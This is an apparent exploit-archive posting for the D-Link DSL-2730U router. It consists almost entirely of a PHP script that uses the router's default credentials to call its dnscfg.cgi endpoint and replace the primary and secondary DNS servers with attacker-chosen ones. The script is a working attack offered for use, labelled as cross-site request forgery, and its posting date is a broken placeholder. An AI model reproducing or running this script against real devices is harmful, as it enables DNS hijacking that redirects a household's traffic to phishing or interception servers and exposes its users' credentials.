DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery
Posted on 30 November -0001
<HTML><HEAD><TITLE>DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><?php #!usr/bin/php #Author: Mateus a.k.a Dctor #fb: fb.com/hatbashbr/ #Modify DNS $ip = "[IP TARGET]"; $dnsfirst = "[Define DNS]"; $dnssecond = "[Define DNS]"; $payload = "http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary="; $pay = $payload.$dnsfirst."&dnsSecondary=".$dnssecond."&dnsIfcsList=&dnsRefresh=1"; $target = get_url_contents($pay); if($target){ echo "[+] DNS Change"; } else{echo "[+] DNS no Change";} function get_url_contents($url) { $crl = curl_init(); curl_setopt($crl, CURLOPT_URL, $url); curl_setopt($crl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($crl, CURLOPT_CONNECTTIMEOUT, 5); $r = curl_exec($crl); $http_status = curl_getinfo($crl, CURLINFO_HTTP_CODE); curl_close($crl); if ($http_status=="200") { return $r; } } ?></BODY></HTML>